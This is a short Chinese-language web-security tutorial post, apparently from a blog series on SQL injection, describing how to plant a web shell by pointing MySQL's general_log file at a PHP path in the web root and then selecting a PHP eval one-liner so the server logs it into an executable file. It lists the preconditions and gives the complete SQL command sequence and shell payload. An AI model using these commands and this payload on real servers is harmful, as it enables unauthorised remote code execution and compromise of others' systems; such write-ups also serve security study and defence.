一、原理:
这也是对之前文章的补充:WEB安全--SQL注入--INTO OUTFILE-CSDN博客
我们可以通过修改MySQL的log文件,用select关键字写入木马文件放在服务器物理地址中,通过访问物理地址getshell。
二、条件:
用户有写入权限
需要知道物理路径(绝对路径)
需要能执行多行SQL语句
关闭对单引号的转义(GPC)
三、利用方式:
sql
show variables like '%general%'; # 查看配置
set global general_log = on; # 开启general log模式,将所有到达MySQL Server的SQL语句记录下来。
set global general_log_file = 'D:/WWW/evil.php'; # 设置日志目录为shell地址
select '<?php eval($_GET[g]);?>' # 写入shell
set global general_log=off; # 关闭general log模式